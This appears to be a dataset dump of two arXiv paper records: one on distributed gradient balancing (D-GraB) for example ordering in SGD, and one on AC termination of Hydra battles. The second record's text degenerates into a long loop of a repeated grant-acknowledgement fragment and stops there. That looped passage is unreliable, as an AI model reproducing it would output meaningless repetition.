id
stringlengths
10
10
title
stringlengths
7
231
abstract
stringlengths
3
2.43k
authors
stringlengths
5
21.5k
published_date
stringlengths
20
20
link
stringlengths
33
34
markdown
stringlengths
133
1.92M
2302.00845
Coordinating Distributed Example Orders for Provably Accelerated Training
Recent research on online Gradient Balancing (GraB) has revealed that there exist permutation-based example orderings for SGD that are guaranteed to outperform random reshuffling (RR). Whereas RR arbitrarily permutes training examples, GraB leverages stale gradients from prior epochs to order examples -- achieving a provably faster convergence rate than RR. However, GraB is limited by design: while it demonstrates an impressive ability to scale-up training on centralized data, it does not naturally extend to modern distributed ML workloads. We therefore propose Coordinated Distributed GraB (CD-GraB), which uses insights from prior work on kernel thinning to translate the benefits of provably faster permutation-based example ordering to distributed settings. With negligible overhead, CD-GraB exhibits a linear speedup in convergence rate over centralized GraB and outperforms distributed RR on a variety of benchmark tasks.
A. Feder Cooper, Wentao Guo, Khiem Pham, Tiancheng Yuan, Charlie F. Ruan, Yucheng Lu, Christopher De Sa
2023-02-02T03:15:29Z
http://arxiv.org/abs/2302.00845v5
# Scale up with Order: Finding Good Data Permutations ###### Abstract Gradient Balancing (GraB) is a recently proposed technique that finds provably better data permutations when training models with multiple epochs over a finite dataset. It converges at a faster rate than the widely adopted Random Reshuffling, by minimizing the discrepancy of the gradients on adjacently selected examples. However, GraB only operates under critical assumptions such as small batch sizes and centralized data, leaving open the question of how to order examples at large scale--i.e. distributed learning with decentralized data. To alleviate the limitation, in this paper we propose D-GraB, an algorithm that orders the examples in a parallel setting with negligible overhead, which enjoys linear speed up at rate \(\tilde{O}((mnT)^{-2/3})\) on smooth non-convex objectives and \(\tilde{O}((mnT)^{-2})\) under PL condition, where \(n\) denotes the number of parallel workers, \(m\) denotes the number of examples per worker and \(T\) denotes the number of epochs. D-GraB benefits from both data ordering and parallelism. Empirically, we show on various applications including GLUE, CIFAR10 and WikiText-2 that D-GraB outperforms naive parallel GraB and Distributed Random Reshuffling in terms of both training and validation performance. ## 1 Introduction Training a machine learning model nowadays could easily involve millions or billions of data examples (e.g. ImageNet (Russakovsky et al., 2015); Wikipedia and BooksCorpus (Devlin et al., 2019)). At this scale, it is crucial to leverage distributed training to process all the examples (Li et al., 2013) for wall-clock time speed up. Orthogonal to parallelism, a recent line of research shows it is possible to find provably better data permutations than random ones for accelerated model convergence (Lu et al., 2021; Mohtashami et al., 2022; Lu et al., 2022). Concretely, Lu et al. (2022) proposes Gradient Balancing (GraB) approaches, which determines the order of dataset scanning in each epoch, by minimizing the discrepancy of the gradient errors computed on adjacently selected examples. Lu et al. (2022) proves GraB converges faster compared to the case where random permutations are used (Mishchenko et al., 2020). Despite the intriguing properties given by GraB, its practicality however, is limited. More specifically, GraB (Lu et al., 2022) critically requires that each single example in the dataset is sequentially visited during training, and that the average gradients computed on all examples stay close over epochs. This prevents us from scaling it up in practice since when a large batch size (parallelism) is used, a batch of examples are visited simultaneously rather than sequentially. In addition, parallelism usually comes with large learning rates, which can potentially make the averaged gradients vary significantly over epochs. In light of this, a natural research question is: _Can we find better data permutations than random reshuffling when parallelism (mini-batching) is used?_ In this paper, we give an affirmative answer with the proposition of D-GraB, an algorithm that alleviates the limitations of original GraB approach and favors distributed learning. D-GraB involves two novel designs: (1) it balances the gradients without leveraging stale gradient mean as adopted in GraB, which gives better balancing approximations even when large learning rates are used; (2) based on the existing parallel learning framework Parameter Server, it additionally lets the server run a parallel ordering protocol, which determines the desired data ordering for each worker in the subsequent epoch. D-GraB mitigates the limitation in GraB where each example must be sequentially visited, with very little overhead. We prove the convergence of D-GraB is faster than distributed random reshuffling (Yun et al., 2021). We show under the same assumptions as the original GraB (Lu et al., 2022), D-GraB enjoys linear speed up at rate \(O((mnT)^{-2/3})\) on smooth non-convex objectives and \(\tilde{O}((mnT)^{-2})\) under PL condition, where \(n\) denotes the number of parallel workers, \(m\) denotes the number of examples per worker and \(T\) denotes the number of epochs. We substantiate our theory on a variety of applications including GLUE, CIFAR10 and WikiText-2. Our contribution in this paper can be summarized as follows: * We propose the parallel herding problem that captures the vector balancing problem in the distributed settings with the constraints that the data cannot be transferred among the workers. * We propose D-GraB, an algorithm that involves a data ordering-aware variant of Parameter Server, which enables distributed training while determining good data permutations for each parallel worker, and we demonstrate how D-GraB will solve the parallel herding problem. * We prove under the same assumptions as the original GraB (Lu et al., 2022), D-GraB enjoys linear speed up at rate \(O((mnT)^{-2/3})\) on smooth non-convex objectives and \(\tilde{O}((mnT)^{-2})\) under PL condition, where \(n\) denotes the number of parallel workers, \(m\) denotes the number of examples per worker and \(T\) denotes the number of epochs, which is provably faster than distributed random reshuffling (Yun et al., 2021). * We show on various applications including GLUE, CIFAR10, and WikiText-2 that D-GraB outperforms naive parallel GraB and random reshuffling in terms of both training and validation performance. ## 2 Related Work **Data Ordering.** Training a machine learning model usually requires scanning over the training dataset following some order. Traditional ordering strategies, such as importance sampling, decide such an ordering following a with-replacement fashion (Schmidt et al., 2017; Needell et al., 2014; Lu et al., 2021). These approaches also include curriculum learning (Bengio et al., 2009), which orders the examples to mimic human learning and improve generalization (Graves et al., 2017; Matiisen et al., 2019; Soviany et al., 2022). In the domain of large scale model training, without-replacement sampling is usually adopted (Bottou, 2012). A common practice is to let models trained with multiple epochs, and in each epoch, the optimizer scans over the entire dataset following a given permutation. There are two common ways to decide the permutations in one epoch: Random Reshuffling (RR) (Ying et al., 2017), where the permutations are random and different over epochs; and Shuffle Once (SO) (Bertsekas, 2011; Gurbuzbalaban et al., 2019), where a random permutation is used but remains fixed over epochs. Recht and Re (2012) undertook the first theoretical investigation of RR, while subsequent works like (Yun et al., 2021, De Sa, 2020) give counter examples where RR orders badly. Indeed, many studies indicate RR and SO only benefit under certain conditions (Mishchenko et al., 2020; HaoChen and Sra, 2019; Gurbuzbalaban et al., 2021). The limitations of RR and SO give rise to a recent line of research on finding better permutations than random ones. Rajput et al. (2022) introduces an interesting variant to RR by reversing the ordering every other epoch, achieving better rates for quadratics. Lu et al. (2021); Mohtashami et al. (2022) initiatively advocate the importance of correlation among adjacently selected examples. It has been provably pointed out in (Lu et al., 2021) that if the averages of consecutive stochastic gradients converge faster to the full gradient, then the SGD with the corresponding sampling strategy will have a faster convergence rate. A recent work (Lu et al., 2022) connects this insight to the classic herding problem (Harvey and Samadi, 2014) and proposes Gradient Balancing (GraB) that solves this problem with much lower complexity compared to (Lu et al., 2021; Mohtashami et al., 2022). Despite its elegance, the scalability of GraB is still limited in scalability for distributed learning settings, which is our main focus in this paper. **Efficient Distributed Training.** Training a machine learning model in a distributed environment is an active research area over the last decades (Dean et al., 2012). There have been various lines of research focusing on speeding up distributed training, such as using asynchrony (Niu et al., 2011; Lian et al., 2015; De Sa et al., 2015; Lu et al., 2020), decentralization (Lian et al., 2017; Lu and De Sa, 2021), compression [Alistarh et al., 2017, Bernstein et al., 2018, Wangni et al., 2018, Wang et al., 2018a], local steps [Stich, 2018, Woodworth et al., 2020, Lin et al., 2019], and combinations of the above techniques [Koloskova et al., 2019, Basu et al., 2019, Lu et al., 2022b]. While most of these algorithms focus on improving communication efficiency, recent studies indicate that data ordering can be another crucial factor for scaling up distributed training. Yun et al. [2021a] conducts a thorough theoretical analysis when Random Reshuffling is used on all the parallel workers. It advocates the shared random seeds among workers to select the permutations (a method referred to as SyncShuf). Some follow-up works emphasize the importance of Random Reshuffling on the server side in distributed training [Huang et al., 2021, Malinovsky et al., 2022, Sadiev et al., 2022]. While these studies provide great heuristics, it is still unclear how we should let parallel workers find better data permutations in a collaborative way, which motivates our work. ## 3 Preliminaries In this section, we illustrate the original GraB approach [Lu et al., 2022a] and its insights. We show how GraB finds provably better data permutations than random ones via the classic herding and balancing framework. Note that throughout this section, the discussion is carried out in a non-parallel setting. Training a machine learning model can be formulated as minimizing a differentiable (loss) function \(f:\mathbb{R}^{d}\rightarrow\mathbb{R}\) over \(N\) data examples. The goal is to obtain the target model weights \(w^{*}=\arg\min_{w}f(w)\), where \(f(w)=\frac{1}{N}\sum_{i=1}^{N}f(w;i)\), and \(f(w;i)\) denotes the loss incurred on the \(i\)-th example (usually an image, a sentence, etc.). A typical training process is to iteratively update the model parameter \(w\) starting from some initial \(w_{1}\) by running \[w_{t+1}=w_{t}-\alpha\nabla f(w_{t};\pi(t))\qquad t=1,2,\cdots \tag{1}\] where \(\alpha\) denotes the learning rate, and \(\pi:[N]\rightarrow[N]\) denotes a permutation (ordering) from which the examples are chosen to compute the example gradients. A common choice for \(\pi\) is a random permutation, which is usually referred to as random reshuffling. GraB [Lu et al., 2022a] initiatively proposes finding better \(\pi\) in Equation (1) than random ones, which yields fast convergence. The main insight there is to find \(\pi\) that minimizes the discrepancy of subsequent gradient error. More formally, Lu et al. [2022a] shows that any permutation \(\pi^{*}\) that guarantees \[\max_{k\in[N]}\left\|\sum_{j=1}^{k}\nabla f(w;\pi(j))-\nabla f(w )\right\|_{\infty} \tag{2}\] to be invariant to \(N\) will give us better rate at \(O((NT)^{-2/3})\) than Random Reshuffling at \(O(N^{-1/3}T^{-2/3})\) on smooth non-convex problems, where \(T\) denotes the number of epochs. The main technique introduced in [Lu et al., 2022a] to find \(\pi\) is leveraged from a classic herding and balancing framework as introduced below. **Herding and Vector Balancing.** The _herding_ problem [Harvey and Samadi, 2014] can be described as follows: Given \(N\) vectors \(\{x_{i}\}_{i=1}^{N}\in\mathbb{R}^{d}\) with \(\left\|x_{i}\right\|_{2}\leq 1,\forall i\) and \(\sum_{i=1}^{N}x_{i}=0\), the goal of herding is to find a permutation \(\pi^{*}\) so that: \[\max_{k\in[N]}\left\|\sum_{i=1}^{k}x_{\pi^{*}(i)}\right\|_{\infty }=\tilde{O}(1) \tag{3}\] It is straightforward to observe that the herding problem generalizes Equation (2). Harvey and Samadi (2014) solves this problem via a subroutine named _balancing_. Concretely, balancing optimizes any given \(\pi\) to reduce the bound in Equation (3) based on a signed version of herding problem: \[\max_{k\in[N]}\left\|\sum_{i=1}^{k}s_{\pi(i)}x_{\pi(i)}\right\|_{\infty} \tag{4}\] where \(\{s_{i}\}_{i=1}^{N}\in\{+1,-1\}\). Harvey and Samadi (2014) provably shows that given arbitrary \(\pi\), calling Algorithm 1 can produce a new permutation \(\pi^{\prime}\) such that \[\max_{k\in[N]}\left\|\sum_{i=1}^{k}x_{\pi^{\prime}(i)}\right\|_{\infty}\leq \frac{1}{2}\max_{k\in[N]}\left\|\sum_{i=1}^{k}s_{\pi(i)}x_{\pi(i)} \right\|_{\infty}+\frac{1}{2}\max_{k\in[N]}\left\|\sum_{i=1}^{k}x_{\pi(i)} \right\|_{\infty}\] Notice that with new permutation, the objective of Equation (3) now approaches the bound of Equation (4). It has be shown in the recent literature that it is quite cheap to find a group of signs such that Equation (4) is in the order of \(\tilde{O}(1)\)(Alweiss et al., 2021) with arbitrary \(\pi\), as shown for example, in Algorithm 4 (in the Appendix). And so if we call Algorithm 1 repeatedly, we will eventually obtain the \(\pi^{*}\) that solves Equation (3). **Gradient Balancing.** Given the herding and balancing framework, GraB (Lu et al., 2022) applies it to minimize Equation (2). The main challenge is then to find the right \(x_{i}\) from the herding balancing framework under the optimization context. Note that the herding balancing framework requires all the vectors to sum to zero. To cope with this, GraB proposes centering the gradients using the stale mean. More specifically, denote \(\pi_{t}\) as the permutation adopted in the \(t\)-th epoch, GraB calls Algorithm 1 with \[x_{i}=\nabla f(w_{t}^{i};\pi_{t}(i))-\frac{1}{N}\sum_{j=1}^{N}\nabla f(w_{t-1} ^{j};\pi_{t-1}(j)) \tag{5}\] where \(w_{t}^{i}\) denotes the model weights after \(i-1\) updates in the \(t\)-th epoch. Lu et al. (2022) provably shows that such definition of \(x_{i}\) preserves the benefits from balancing with negligible noise. The only overhead of GraB is then to store the running average of gradients in one epoch to "center" the gradients in the subsequent epoch. ## 4 Distributed Gradient Balancing In this section, we give a more formal description of distributed training, and illustrate the limitations of GraB under such context. We then formulate parallel herding problem and illustrate how we can order data in a distributed setting without using stale mean. We formulate all our approaches into an algorithm named D-GraB. We conclude this section by proving D-GraB enjoys linear speed up convergence. **Setup.** We consider the standard data-parallel training setup with \(n\) parallel workers, where each worker keeps a copy of the model weights \(w\in\mathbb{R}^{d}\). Each worker maintains \(m=N/n\) examples 1 (data points) and they collaborate to find a target model weight \(w\in\mathbb{R}^{d}\) such that the averaged loss incurred on all the examples over all the workers can be minimized. This can be formally expressed as, Footnote 1: Without the loss of generality, we assume the total number of examples \(N\) divides the number of workers \(n\), and \(m\) divides \(2\). \[\min_{w\in\mathbb{R}^{d}}\frac{1}{n}\sum_{i=1}^{n}f^{i}(w)\quad\text{with} \quad f^{i}(w)=\frac{1}{m}\sum_{j=1}^{m}f^{i}(w;j) \tag{6}\] where \(f^{i}(w;j):\mathbb{R}^{d}\rightarrow\mathbb{R}\), \(j\in[m]\), denotes the loss incurred on the \(j\)-th example on the \(i\)-th worker over model weight \(w\). We assume the examples cannot be shared or transferred among the workers. This setup naturally captures many real-world applications such as federated learning. Consider running Equation (1) using this setup, where each worker scans over their local examples using (potentially) different permutations, we denote \(\pi_{t,i}:[m]\rightarrow[m]\) as the permutation adopted on the \(i\)-th worker in the \(t\)-th epoch. The update to the model can then be summarized as: \[w_{t}^{j+1}=w_{t}^{j}-\frac{\alpha}{n}\sum_{i=1}^{n}\nabla f^{i}(w_{t}^{j};\pi_{t,i}(j)),\forall j\in[m] \tag{7}\] for \(j\in[m]\), where \(w_{t}^{j}\) denotes the model weights after \(j\) gradient updates in the \(t\)-th epoch. That is, in epoch \(t\), all the workers select the \(j\)-th example locally according to \(\{\pi_{t,i}\}_{i=1}^{n}\) to compute stochastic gradients. **Issue with GraB in distributed training.** Given the constraint of parallelism and the fact that examples cannot be transferred among the workers, it is obvious that Algorithm 1 can no longer guarantee Equation (3). On the other hand, since in practice, larger learning rates are usually adopted when the system scales up (Smith et al., 2018), this makes the stale mean approach (Equation (5)) unreliable as the averaged gradients in adjacent epochs no longer stay close. To address these limitations, we next introduce _parallel herding_ problem and a balance subroutine named _PairBalance_. **Parallel Herding.** We adapt the herding problem to the following: Given a group of \(x_{i,j}\in\mathbb{R}^{d}\) for \(i\in[n]\), \(j\in[m]\) with \(\|x_{i,j}\|_{2}\leq 1\) and \(\sum_{ij}x_{ij}=0\), the goal of parallel herding is to find \(n\) permutations, \(\pi_{1},\pi_{2},\ldots,\pi_{n}\) of \(\{1,\ldots,m\}\) so as to minimize \[\max_{k\in\{1,\ldots,m\}}\ \left\|\sum_{j=1}^{k}\sum_{i=1}^{n}x_{i,\pi_{i}(j)} \right\|_{\infty} \tag{8}\] This formulation naturally captures the property that \(x_{i,j}\) cannot be transferred among the workers. We next introduce a new balancing subroutine that solves this. **Insights from Kernel Thinning.** The intuition upon which we build our approach to solve parallel herding is closely connected to recent research on _Kernel Thinning_(Dwivedi and Mackey, 2021a,b, Barp et al., 2022). Concretely, the original kernel thinning paper (Dwivedi and Mackey, 2021a) introduces an algorithm that minimizes the Maximum Mean Discrepancy (MMD) between a selected coreset and a empirical distribution. It also analyzes a new self-balancing Hilbert walk that generalizes the algorithm introduced in (Alweiss et al., 2021). Methodologically, Dwivedi and Mackey (2021a) solves the coreset selection problem via two phases: (1) it iteratively halves the input vector sequence into balanced coresets; and (2) it selects and refines a candidate coreset that minimizes the MMD with the input sequence. The method uses a balancing walk on differences of pairs of examples to select exactly half of the points in a dataset, and comes with a useful property: it eliminates the requirement of knowing maximum vector norm ahead of time and centering the vectors (i.e., making all the vectors sum to zero). **PairBalance.** Following the insight from _Kernel Thinning_, we balance vector differences over paired vectors, so as to eliminate vector centering. We extend this insight to the distributed training setting, and propose the PairBalance subroutine algorithm. The high-level idea of PairBalance algorithm is to apply Algorithm 1 on the following "flattened" and "paired" sequence: \[y_{n(k-1)+i}\gets x_{i,2k-1}-x_{i,2k}.\] This new sequence has a nice property that by pairing the vectors, the difference becomes invariant to the vector mean. In other words, if all the vectors are shifted by the same noise, their pairwise differences will remain the same. Now fitting \(\{y_{i}\}_{i=1}^{N/2}\) into the herding and balancing framework, we can see each sign assigned to each \(y\) decides the signs for paired \(x\) simultaneously. More concretely, if \(s\) is the sign associated with \(y_{n(k-1)+i}\), then \(x_{i,2k-1}\) and \(x_{i,2k}\) will receive opposite signs \(s\) and \(-s\), respectively. Denote \(x_{i,k}^{+}\) the term that receives the positive sign and \(x_{i,k}^{-}\) the negative sign, then for any \(i\in[n]\) and \(l\in[m/2]\) \[\sum_{k=1}^{l}\sum_{i=1}^{n}x_{i,k}^{+} =\frac{1}{2}\sum_{j=1}^{m}\sum_{i=1}^{n}x_{i,j}+\frac{1}{2}\sum_{k =1}^{l}\sum_{i=1}^{n}\left(x_{i,k}^{+}-x_{i,k}^{-}\right)\] \[\sum_{k=1}^{l}\sum_{i=1}^{n}x_{i,k}^{-} =\frac{1}{2}\sum_{j=1}^{m}\sum_{i=1}^{n}x_{i,j}-\frac{1}{2}\sum_{k =1}^{l}\sum_{i=1}^{n}\left(x_{i,k}^{+}-x_{i,k}^{-}\right)\] These equations, similar to the herding case, allow us to bound the parallel herding objective. Most importantly, it allows us to bound Equation (8) without moving the examples across workers. We now prove the correctness of PairBalance. Note that in the previous section, we introduce a concrete algorithm (Algorithm 4 in the Appendix) that guarantees the signed herding objective (Equation (4)) to be in the order of \(\tilde{O}(1)\). To make this more general, we make the following assumption, **Assumption 1**.: _There exists a balancing algorithm Balance and a constant \(\tilde{A}>0\) such that for any input vectors \(\{x_{i}\}_{i=1}^{N}\) with \(\left\|x_{i}\right\|_{2}\leq 1\) and \(\sum_{i=1}^{N}x_{i}=0\), Balance outputs a sequence of signs \(\{s_{i}\}_{i=1}^{N}\in\{-1,1\}\) such that_ \[\max_{k\in[N]}\left\|\sum_{i=1}^{k}s_{i}x_{i}\right\|_{\infty}\leq\tilde{A}\] With this assumption, we now provide the correctness guarantee of PairBalance in the following lemma. **Lemma 1**.: _Consider vectors \(x_{i,j}\) for \(i\in[n]\) and \(j\in[m]\) that satisfies:_ \[\left\|\sum_{j=1}^{m}\sum_{i=1}^{n}x_{i,j}\right\|_{\infty}\leq c_{1}\] \[\left\|x_{i,j}-\frac{1}{mn}\sum_{j=1}^{m}\sum_{i=1}^{n}x_{i,j}\right\|_{\infty} \leq c_{2}\ \forall\ i,j\] _for some constants \(c_{1}>0\) and \(c_{2}>0\). Let \(\pi_{i}^{\prime}(j)\) be the output of Algorithm 1 using inputs:_ \[y_{n(k-1)+i}=x_{i,\pi_{i}(2k-1)}-x_{i,\pi_{i}(2k)}\] _for \(k\in[m/2]\) and initial order \(\pi_{i}(j)\), then it holds that:_ \[\max_{l\in[m]}\left\|\sum_{j=1}^{l}\sum_{i=1}^{n}x_{i,\pi_{i}^{ \prime}(j)}\right\|_{\infty}\leq \frac{1}{2}\max_{l\in[m]}\left\|\sum_{j=1}^{l}\sum_{i=1}^{n}x_{i, \pi_{i}(j)}\right\|_{\infty}+c_{1}+\tilde{A}c_{2}.\] Lemma 1 shows that PairBalance reduces the herding objective towards a constant (invariant to \(n\)) at each step. This implies if we repeatedly call PairBalance on a given permutation, this will give us a permutation that guarantees the parallel herding bound to be \(\tilde{O}(1)\). To better understand the effectiveness of PairBalance, we perform a simulation experiment on 1 million zero-centered random vectors with \(L_{2}\) norm as 1. On the right subfigure, each worker gets a partition of all random vectors, and performs balance & reorder algorithms for 15 rounds. The random vectors cannot be moved across different workers. The results are shown in Figure 1, and more details can be found in Appendix A.1. **D-GraB.** With parallel herding problem solved, now we introduce the full-stack algorithm that trains model in a distributed setting while ordering the examples based on PairBalance. We give the formal description in Algorithm 2. Note that the Balance subroutine in Algorithm 2 can be replaced by the PairBalance. We proceed to provide the convergence guarantee for D-GraB (Algorithm 2). We start from a few assumptions. **Assumption 2** (**Bounded Gradient Variance**).: \(\forall i\in[n]\) _there exists a constant \(\sigma>0\) such that \(\forall j\in[m],\forall w\in\mathbb{R}^{d}\), it holds that_ \[\left\|\nabla f^{i}(w,j)-\nabla f^{i}(w)\right\|_{2}^{2}\leq\sigma^{2}\] **Assumption 3** (**Bounded Data Heterogeneity**).: _There exists a constant \(\varsigma>0\) such that \(\forall i\in[n]\),_ \[\left\|\nabla f^{i}(w)-\nabla f(w)\right\|_{2}^{2}\leq\varsigma^{2}\] Figure 1: Herding Bound & Parallel Herding Bound of Multiple Balance Algorithms. Independent Balance and Independent PairBalance means each parallel worker runs Balance and PairBalance subroutine independently, respectively. The first 2 assumptions are common in the distributed optimization setting, enforcing that the deviation from the mean of the gradient of each local loss function \(\nabla f^{i}(w,j)\), or node \(\nabla f^{i}(w)\), is uniformly bounded. Although we require uniform boundedness, our upper-bound is deterministic, in contrast to an in-expectation bound which usually goes with the weaker bounded variance assumption. **Assumption 4** (**Smoothness**).: _There exists constant \(L_{\infty}>0\) and \(L_{2,\infty}>0\) such that for any \(w,v\in\mathbb{R}^{d}\) and any \(j\in[m]\), it holds that_ \[\left\|\nabla f^{i}(w,j)-\nabla f^{i}(v,j)\right\|_{\infty}\leq L_{\infty}\|w- v\|_{\infty}\] _and_ \[\left\|\nabla f^{i}(w,j)-\nabla f^{i}(v,j)\right\|_{2}\leq L_{2,\infty}\|w- v\|_{\infty}\] **Assumption 5** (**PL Condition**).: _We say the loss function \(f\) fulfills the Polyak-Lojasiewicz (PL) condition if there exists \(\mu>0\) such that for any \(w\in\mathbb{R}^{d}\),_ \[\frac{1}{2}\|\nabla f(w)\|_{2}^{2}\geq\mu(f(w)-\inf_{v\in\mathbb{R}^{d}}f(v))\] Similar to Lu et al. (2022), we use the cross-norm \(L_{2,\infty}\) smoothness. Note that we can also use the commonly adopted \(L_{2}\)-smoothness: then this assumption is implied with smoothness parameter \(\sqrt{d}L_{2}\). We now give the convergence bound of D-GraB as follows. **Theorem 1**.: _In Algorithm 2, if we use Algorithm 3 as the Balance subroutine and set \(\alpha\) to be:_ \[\alpha=\min\left\{\frac{1}{16\max\{L_{\infty},L_{2,\infty}\}(2m+\tilde{A}/n)},\left(\frac{4F_{1}}{m\Gamma T}\right)^{1/3}\right\},\] _under Assumption 1,2,3,4, it holds that:_ \[\frac{1}{T}\sum_{t=1}^{T}\left\|\nabla f(w_{t})\right\|_{2}^{2}\leq\tilde{O} \left(\frac{1}{(mnT)^{2/3}}+\frac{1}{T}\right),\] _where \(F_{1}=f(w_{1})-\inf_{w}f(w)\) and,_ \[\Gamma=\frac{24(L_{2,\infty}(\varsigma+\sigma)\tilde{A})^{2}}{n^{2}}+\frac{9L _{2,\infty}^{2}m^{2}\sigma^{2}}{T}.\] Figure 2: PairBalance in Centralized Data (Left) & Decentralized Data (Right) Settings. \(x_{ij}\) denotes the \(j\)-th vector on the \(i\)-th worker. _Furthermore, under Assumption 5, it holds that_ \[f(w_{T})-\inf_{w\in\mathbb{R}^{d}}f(w)\leq\tilde{O}\left(\frac{1}{m^{2}n^{2}T^{2}} \right).\] Comparing the bound to (Lu et al., 2022), we can see that D-GraB enjoys the same fast convergence speed of original GraB while ensuring linear speed up over the number of workers. D-GraB also converges at rate \(\tilde{O}((mnT)^{-2})\) under PL condition, faster than Yun et al. (2021)'s high probability bound of \(\tilde{O}(T^{-2}(mn)^{-1})\) (termed minibatch RR in their paper), even with their synchronized shuffling trick's \(\tilde{O}((nT)^{-2}m^{-1})\) which requires bounded component-wise outer deviation. ## 5 Experiment **Model and Dataset.** We investigate the performance of PairBalance in real applications with centralized and decentralized data. We adopt the following model training tasks for evaluation: (1) logistic regression with BERT (Devlin et al., 2019) embeddings on 2 GLUE (Wang et al., 2018) tasks (QQP, QNLI), (2) LeNet (Lecun et al., 1998) on CIFAR-10 (Krizhevsky et al., 2009), and (3) LSTM (Hochreiter and Schmidhuber, 1997) on WikiText-2 (Merity et al., 2018). Details of the dataset and model can be found in Appendix A.2. ### Centralized Data In this setting, there is only 1 worker that holds the entire dataset. We investigate PairBalance's convergence rate against the Balance algorithm provided in Lu et al. (2022) and Random Reshuffling on a single GPU. **Baseline Example Ordering Algorithms** * **Centralized Random Reshuffling (C-RR)** The RR sorter gets a random permutation of the entire dataset at the start of each epoch. * **Centralized Balance (C-B)** We use the GraB algorithm provided by Lu et al. (2022). **Evaluation.** The convergence plot can be found in Figure 3: while Centralized Balance serves as the performance upper bound in most cases, both Centralized Balance and Centralized PairBalance outperform Centralized Random Reshuffling significantly. Notice that "Full Train Loss" means the full training objective achieved by \(w_{T}\) after \(T\) epochs, or formally \(\frac{1}{N}\sum_{i=1}^{N}f(w_{T};i)\). We observe Centralized Balance shows a slightly better convergence rate than Centralized PairBalance for the following two reasons. (1) Since we only use a small learning rate, Centralized Balance is not significantly impacted by the issue of stale mean. (2) Centralized Balance balances the examples in the finest granularity, while PairBalance can only achieve the granularity of 2 as it balances on pairs of examples. However, Figure 3: Convergence Plots of Logistic Regression w. BERT Embeddings on GLUE (QQP), and LeNet on CIFAR-10. We run each task with 3 random seeds, and plot the average statistics as the line and the standard deviation across different seeds as the shaded area. centralized Balance and Centralized PairBalance have \(\tilde{O}(1)\) herding objective, and Figure 3 demonstrates a minimal performance gap. ### Decentralized Data We have \(n\) workers with identical initial weights in this setting, and we partition the entire dataset evenly into \(n\) folds 2. At the start of each epoch, each worker will compute their new data permutation. On each optimization step, each worker will gather gradients from all other workers and take an average as the minibatch-averaged gradients for updating their local weights. Footnote 2: We discard the remainder after partitioning the dataset. **Baseline Example Ordering Algorithms** * **Distributed Random Reshuffling (D-RR)** Each worker will get a random permutation of their local dataset per epoch, as shown in Huang et al. [2021]. * **Independent Balance (I-B)** Each worker runs Balance independently. * **Independent PairBalance (I-PB)** Each worker runs PairBalance independently. **Evaluation.** We conduct experiments for both convex and non-convex cases: for convex experiments, we consider Logistic Regression with BERT Embeddings on QQP and QNLI tasks; for non-convex experiments, we consider LeNet on CIFAR-10 and LSTM on WikiText-2. The convergence plots can be found in Figure 4. Throughout all experiments, the performance gap between D-GraB and D-RR can be significant, as we observe in Figure 4(c). In general, D-GraB achieves the best results with the lowest standard deviation among all baseline example ordering algorithms. Figure 4: Convergence Plots of Logistic Regression w. BERT Embeddings on GLUE (QNLI & QQP), LeNet on CIFAR-10, and LSTM on WikiText-2. We run 3 random seeds for each task, and we plot the average statistics as the line and the standard deviation across different seeds as the shaded area. **Training Time Analysis.** We compare the computation time for D-GraB and D-RR to run the LeNet on CIFAR-10 task. We utilize a single machine with 4 Nvidia GeForce RTX 2080 Ti GPUs to host 4 workers (one worker per GPU) with NCCL NVIDIA as the communication backend. The results are shown in Figure 5: D-GraB's full train loss decreases faster in wall-clock time, and the PairBalance step only consumes 10% of an epoch's length on average as shown in the right subfigure 3. Theoretically, the training time for D-GraB only differs from D-RR on the sorter step. Currently, our sorter step for D-GraB uses a blocking call for simplicity, and if we parallelize the sorter step (Sorter) with the optimization step (SGD) for each worker, we can further improve the time efficiency of D-GraB, since these two do not depend on each other. Please refer to Appendix A.5 for more details. Footnote 3: Commun.” stands for the communication of gradients. **Scalability.** Interested in the convergence rate of D-GraB compared with other sorting algorithms on different numbers of workers, we ablate the number of workers for the LeNet on CIFAR-10 task and make a convergence plot of full train loss & test accuracy from 4 to 64 workers as shown in Figure 6. We observe that D-GraB is robust to different numbers of workers, and when we have more workers, the performance gaps between D-GraB and Independent Balance (I-B) and Independent PairBalance (I-PB) become larger. Therefore, our D-GraB is suitable for data parallelism compared with other sorters. ## 6 Conclusion In this paper, we propose D-GraB, an algorithm that finds provably better data permutations than random ones in a distributed setting. We prove in theory that D-GraB enjoys linear speed up and converges faster than random reshuffling. We substantiate our theory and effectiveness of D-GraB on multiple machine learning applications including GLUE, CIFAR-10 and WikiText-2. Figure 5: The Analysis of Training Time of D-GraB & D-RR for the LeNet on CIFAR-10 Task. The time is averaged across 3 runs and across 4 workers. The left subfigure records the full train loss over wall-clock time, and the right subfigure compares each component’s length averaged per epoch along with their standard deviations, with the time distribution of each component for D-GraB labeled on top.
2307.14036
Hydra Battles and AC Termination
We present a new encoding of the Battle of Hercules and Hydra as a rewrite system with AC symbols. Unlike earlier term rewriting encodings, it faithfully models any strategy of Hercules to beat Hydra. To prove the termination of our encoding, we employ type introduction in connection with many-sorted semantic labeling for AC rewriting and AC-MPO, a new AC compatible reduction order that can be seen as a much weakened version of AC-RPO.
Nao Hirokawa, Aart Middeldorp
2023-07-26T08:40:21Z
http://arxiv.org/abs/2307.14036v2
# Hydra Battles and AC Termination, Revisited ###### Abstract We present a termination proof for the Battle of Hercules and Hydra represented as a rewrite system with AC symbols. Our proof employs type introduction in connection with many-sorted semantic labeling for AC rewriting and AC-RPO. JSPS KAKENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant 